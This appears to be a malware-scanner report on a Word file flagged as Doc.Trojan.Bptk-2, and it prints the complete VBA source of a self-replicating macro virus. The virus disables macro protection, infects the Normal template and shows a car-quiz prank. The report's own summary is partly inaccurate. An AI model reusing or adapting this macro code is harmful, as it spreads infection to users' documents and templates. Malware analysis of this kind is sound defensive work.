MALICIOUS
122
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The file contains a VBA macro that executes upon document closure, specifically targeting the 'Document_Open' event. This macro attempts to copy its own code to the Normal template, which is a common technique for establishing persistence. The embedded VBA code includes several input boxes with questions related to '长安公司汽研所' and '长安之星', suggesting a lure or distraction, possibly related to a scam or phishing attempt. The ClamAV detection 'Doc.Trojan.Bptk-2' further indicates malicious intent.
Heuristics 4
-
ClamAV: Doc.Trojan.Bptk-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Bptk-2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3335 bytes |
SHA-256: 6f2274a1c89ba7e5fc8d0b0c0f0197fe73b149e2870f737d732b8ef7095e2367 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim DI As Boolean, TI As Boolean, d As Object, t As Object, Src As String, r As String
Private Sub Document_Close()
On Error Resume Next
Set d = ActiveDocument.VBProject.VBComponents.Item(1)
Set t = NormalTemplate.VBProject.VBComponents.Item(1)
DI = d.CodeModule.Find("长安公司汽研所 常识课", 1, 1, 10000, 10000)
TI = t.CodeModule.Find("长安公司汽研所 常识课", 1, 1, 10000, 10000)
Options.VirusProtection = False
If DI And Not (TI) Then
Src = d.CodeModule.Lines(1, d.CodeModule.CountOfLines)
t.CodeModule.DeleteLines 1, t.CodeModule.CountOfLines
t.CodeModule.AddFromString Src
NormalTemplate.Save
ElseIf TI And Not (DI) Then
If Day(Now()) = 1 Then
Do
r = UCase(InputBox("长安之星车长多少米?" & Chr(13) & Chr(13) _
& "A.3米4 B.3米5 C.3米55 D.3米7" & Chr(13) & Chr(13) _
& "要好好思考哟!", "紧急提问"))
Loop Until r <> ""
If r = "B" Then
MsgBox "好棒哟!"
GoTo 10
Else
MsgBox "唉!再给你一次机会."
Do
r = UCase(InputBox("长安之星FBA是什么型?" & Chr(13) & Chr(13) _
& "A.标准型 B.普通型 C.豪华型" & Chr(13) & Chr(13) _
& "想好了再回答!", "紧急提问"))
Loop Until r <> ""
If r = "C" Then
MsgBox "谢谢你的支持!"
GoTo 10
Else
MsgBox "笨蛋!给你最后一次机会."
Do
r = UCase(InputBox("安全气囊是干什么用的?" & Chr(13) & Chr(13) _
& "A.防止撞车 B.防止侧滑 C.撞车时保护驾驶员" & Chr(13) & Chr(13) _
& "这是最后一次机会哟!", "紧急提问"))
Loop Until r <> ""
If r = "C" Then
MsgBox "总算答对了!"
GoTo 10
Else
MsgBox "看来你还需要对长安之星多加了解..."
ActiveDocument.SaveAs "c:\lzc.vxd"
ActiveDocument.Close
Exit Sub
End If
End If
End If
End If
10:
Src = t.CodeModule.Lines(1, t.CodeModule.CountOfLines)
d.CodeModule.DeleteLines 1, d.CodeModule.CountOfLines
d.CodeModule.AddFromString Src
ActiveDocument.Save
End If
End Sub
Private Sub Document_Open()
On Error Resume Next
Set d = ActiveDocument.VBProject.VBComponents.Item(1)
Set t = NormalTemplate.VBProject.VBComponents.Item(1)
DI = d.CodeModule.Find("长安公司汽研所 常识课", 1, 1, 10000, 10000)
TI = t.CodeModule.Find("长安公司汽研所 常识课", 1, 1, 10000, 10000)
Options.VirusProtection = False
If DI And Not (TI) Then
t.CodeModule.DeleteLines 1, t.CodeModule.CountOfLines
ElseIf TI And Not (DI) Then
d.CodeModule.DeleteLines 1, d.CodeModule.CountOfLines
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.